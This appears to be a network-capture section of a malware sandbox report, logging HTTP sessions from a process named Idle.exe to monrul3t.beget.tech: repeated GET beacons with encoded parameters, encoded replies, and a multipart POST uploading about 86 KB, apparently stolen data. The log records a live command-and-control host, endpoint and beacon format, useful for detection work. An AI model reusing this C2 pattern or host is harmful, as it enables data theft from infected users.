                                                                                            Date: Sat, 11 Jan 2025 17:07:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Jan 11, 2025 18:07:17.102787018 CET2809OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&12c459a86df5a98a63f3de23b4087211=QX9JCMulUNKhlWykjMZxmSGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETpRjMkZXNyEWdWxWS2kUajxmTYZFdGdlWw4EbJNXSpJ2M50mYyVzVWl2bqlkb1cVWNFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQWJGaWdEZUp0QMlWRt5UaGdFT3dmaOJTWE50dJJTZ1BDSNdXQE10dBRUT3RzUNVXQqx0dz5WS2kUejxWNyI2bCNjY550Vh5kSDxUaJl2Tp1EWihmTtlFbkxWSzlUaiNmSIhFerZVUNJUMVpkUFh1Y1MEWjhnRYl2bqlke1clWsp0MZRlSDxUa0IDZ2VjMhVnVslkNJNUVKVTVR1kSDxUaJBjUnFlaJZTSTRlQKxWSzlUaiNTOtJmc1clVp9maJNHeXl1MW12Ywp1aJNXSpNGbS1mYsp1VaVkQ5N2M5ckW1xmMWl2bqlkeW52YwpFWhBTNXFVa3lWSVZkaNdlWrlkNJlmY2xmMjlnVtZFV5U1UDp0QMlWSE5ENFRVT5VEVNlXSqxEMZpWU1F [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:17.351427078 CET221INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.4536365.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:16.741200924 CET759OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nIklzY3IWN4IDNlVWO4MWO4MzY2YWMhdTO4YGN5czMwQGMwUDOjZ2YxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:17.477341890 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 31 55 44 4e 79 51 54 5a 79 51 32 59 6d 6c 6a 4e 34 4d 6d 59 6a 4a 54 5a 30 45 6a 59 30 49 6a 4e 31 45 44 5a 7a 45 32 4e 7a 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6ICN1UDNyQTZyQ2YmljN4MmYjJTZ0EjY0IjN1EDZzE2NzIye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye
                                                                                            Jan 11, 2025 18:07:17.481484890 CET2309OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZ [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:17.882611990 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.4536425.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:22.204448938 CET837OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=QX9JSUNJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3IDNiR2NlZDZxQGZ3QDM2YzMyEmM1UjN0YDOjlTM4ITYyQmMlljZxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:07:23.119805098 CET221INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Jan 11, 2025 18:07:23.125905991 CET570OUTPOST /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryJp3V6slVJ7hXe8d3
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                            Host: monrul3t.beget.tech
                                                                                            Content-Length: 86203
                                                                                            Expect: 100-continue
                                                                                            Jan 11, 2025 18:07:23.352438927 CET25INHTTP/1.1 100 Continue
                                                                                            Jan 11, 2025 18:07:23.352929115 CET13596OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 4a 70 33 56 36 73 6c 56 4a 37 68 58 65 38 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61
                                                                                            Data Ascii: ------------WebKitFormBoundaryJp3V6slVJ7hXe8d3Content-Disposition: form-data; name="7991617897d9fa8d208b6a329d126528"wMmMwMzNmNTY0kTMlJzYjZGNhZDOkN2Y3UmMwIzY0UDZyYmM5gDOy0CNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjM----------
                                                                                            Jan 11, 2025 18:07:23.357872963 CET2472OUTData Raw: e2 40 d3 d3 3c 5c 2a 02 69 5c c0 9a 0c 02 3e 79 11 cb da 20 8d ee b9 54 85 32 a2 ab a5 d2 e3 1c 13 b4 66 5b fc c7 fe 61 a0 3f 1b fa 13 b4 96 92 18 fb 52 de e9 08 2c a0 46 32 df 12 da 4a 17 46 32 42 95 e7 13 71 87 19 9a fc 80 0e 08 3b cb fd 93 90
                                                                                            Data Ascii: @<\*i\>y T2f[a?R,F2JF2Bq;*0C5!Rb9Jy`MJa7M,w=?.hJO85,r5K-om=Y_i8xtw),<R{^.c8
                                                                                            Jan 11, 2025 18:07:23.357922077 CET2472OUTData Raw: ff aa a2 88 26 ab 69 36 91 45 d0 cd f8 8c 2d da cb 55 29 a8 b5 7a d0 22 6d f0 f7 9d ea 78 5e e2 46 48 67 ad 18 57 4a e7 b5 4f a2 e5 f0 08 9d 37 7c 47 3d de d4 07 f6 a6 8d ed c6 7e bf cc eb aa b2 c0 fb ca 2e 01 01 55 83 42 69 87 fe e2 4f 7a 12 6f
                                                                                            Data Ascii: &i6E-U)z"mx^FHgWJO7|G=~.UBiOzol;ds^"]+bFkJ"z.\$frP3Fy"?#/G;sn`ry#x![U4IwEy|Jdj&f5e^q{8sKMOKh
                                                                                            Jan 11, 2025 18:07:23.357954025 CET2472OUTData Raw: 81 d4 dc ac 73 a0 54 e2 dd 02 cf 38 cd 65 76 6a 5a 07 c4 b4 04 0b 64 67 34 a3 e6 2f be 7a 65 36 39 3a f1 33 63 fd 55 d6 9c 2b 3f 41 44 56 d2 a6 8d 60 d4 59 d2 50 ef 21 00 66 b1 67 54 97 b4 a5 29 d1 77 3f 8b d3 bb b2 ee b6 88 38 f1 83 5a f9 14 b9
                                                                                            Data Ascii: sT8evjZdg4/ze69:3cU+?ADV`YP!fgT)w?8ZZEUN9P}<)f;@zH4 ;+g|j/:-K2AKnoK.KC-AI?I&-%'##PF3~S.A51
                                                                                            Jan 11, 2025 18:07:23.358004093 CET2472OUTData Raw: 38 d7 9c fe 57 92 c7 b8 ea af 8a 55 59 a5 79 5d b7 22 79 3e 6b 3f bb e4 77 1d a7 ee ea dd f2 c5 be ba 52 71 e2 1d 4f 5d c4 74 57 ed 75 ae 44 2f 97 cc 75 f9 26 97 79 b5 65 ae 6d f1 f5 82 1b 7a f7 cf 9f 59 30 d9 f5 7e f3 26 9c 7b a1 37 58 e8 cb 6f
                                                                                            Data Ascii: 8WUYy]"y>k?wRqO]tWuD/u&yemzY0~&{7Xoq2Wkx}GR$))?iwFr}!\2<W)sLyy$Ud976r/N{sD,Xg<Xl?hatKv}#p1CSd
                                                                                            Jan 11, 2025 18:07:23.358023882 CET2472OUTData Raw: 95 45 3b 73 35 3d 27 cd 77 c9 f0 57 cd 8b 3b 55 c6 55 ef a1 6e c9 17 ad 6f 99 ff 8c 5c 36 8f 11 a2 3c ed f7 20 2d 72 9a 53 1a 64 f9 43 a1 43 36 00 25 3c f3 28 de e4 7b 78 4d 82 9c b6 67 86 94 d4 9c c1 2c 4e 04 c3 27 51 77 d6 d9 75 64 f8 fb c6 f0
                                                                                            Data Ascii: E;s5='wW;UUno\6< -rSdCC6%<({xMg,N'Qwud}Y##-A.!6&`%C`])7yy%Y%e[ }GquEO33Dw f*_pmzv>g~<PeI^X
                                                                                            Jan 11, 2025 18:07:23.358292103 CET4944OUTData Raw: b2 cf 86 c8 c6 eb 15 af 6c 8d 50 4b e5 63 5a a4 8f 6f a9 21 8b 29 2f c7 6c a2 e4 e8 7c 05 e4 e0 ef 5b b9 8a 69 fa 2b a5 23 fb d5 b2 de 42 d4 23 f5 63 4e c5 e2 de b7 4e 45 cb 60 8f 19 f8 4b 37 b2 bf 5e 64 63 cd 3d ec 6f 9f b1 8d 7f 45 1c 55 61 81
                                                                                            Data Ascii: lPKcZo!)/l|[i+#B#cNNE`K7^dc=oEUa0pm3bDK?Qssu9QLwU $,RtDP0},n:dQmcv>Q?]Uf6kK ]bOVF'(L%7T10
                                                                                            Jan 11, 2025 18:07:23.358323097 CET2472OUTData Raw: bc ee f7 e1 1f 97 2b 46 8e 1a 67 b5 f3 0e c5 4b d2 db e0 b7 30 fe 01 cc 23 62 5e df 23 99 5f ec 5c e7 08 51 49 46 af 94 a5 ce c4 ff 2c b1 53 a5 5f a3 f9 39 4b 71 24 f3 e5 b3 22 ec ef 9b 0a d3 b9 7e 63 b4 a6 e1 a7 f7 6f 8c 70 15 3f 8a 7d 20 7e 7e
                                                                                            Data Ascii: +FgK0#b^#_\QIF,S_9Kq$"~cop?} ~~n|*eT(3-5'c}%eg0>GE;is[*9)"w$-hW+WiFy(B~=6,kP,yFo)(!/ne;@qfe"g]mKr;=1G
                                                                                            Jan 11, 2025 18:07:23.358342886 CET2472OUTData Raw: 14 eb 98 70 5b c5 81 8f 9d 83 cb cf b2 29 5d ec cf c4 aa 95 c1 74 3a 2e 73 35 55 aa d0 8c 03 c1 a7 e5 f8 87 b0 43 76 65 e8 8f de 19 be 76 8b ce d0 7e 0c 9e 1f ca 95 6e 09 aa 3c 87 09 4f 2c ac 7d 6c b7 aa a9 d3 e7 ac e7 f8 30 27 c9 f7 20 cd a0 26
                                                                                            Data Ascii: p[)]t:.s5UCvev~n<O,}l0' &^#1S+yT5v[7t]=oRLW~JTHuB9|b_<vncrGYB<4#xi4}EduY$Q#3UprZ*fsR?}#CE/GHq
                                                                                            Jan 11, 2025 18:07:23.358398914 CET2472OUTData Raw: 06 11 a5 91 50 24 44 10 19 a5 48 48 37 48 f7 f6 7f 37 f0 fb be ff ef ba bc 64 f1 9e f3 c6 ce 79 ce fd 9c e7 79 ee 7b 6c 2c dc ad a9 17 9d f1 77 a7 01 51 64 65 69 61 05 2f 3b f3 e5 f9 cb 49 89 2b ea 32 06 54 59 ab 2c bf 68 db 8e e4 01 c0 3e 4c 7d
                                                                                            Data Ascii: P$DHH7H7dyy{l,wQdeia/;I+2TY,h>L}H.py!Aj7c]q]O&tywtjs,nby *8F=q9?EKJD13ab"y@C8b.z =U'I6ON$n:>)RH'?EoO
                                                                                            Jan 11, 2025 18:07:23.865328074 CET221INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.4536435.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:22.949912071 CET2972OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWaJRUT2klaNZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:07:23.950131893 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.4536445.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:07:28.963996887 CET2948OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWajRkT20keNZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:29.697926044 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:29 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye
                                                                                            Jan 11, 2025 18:07:34.707669973 CET2948OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYisHL9JCMYZWarpWT2UleNZTUE1UavpWStpleONTUE9EbGRlTzUleNJTTy0UNVRlWpJVbZhXUq5ENRJjT0UkMOtmRtlFaKdVWsp1RapXSDxUaVNUT6lUaPl2aE1EeZR1TppEVNtmRt50MjpWT4tGROhXUE5EbSpnT00keNpXQq5UbOJTT3FFRNNT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:07:34.936712027 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:07:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
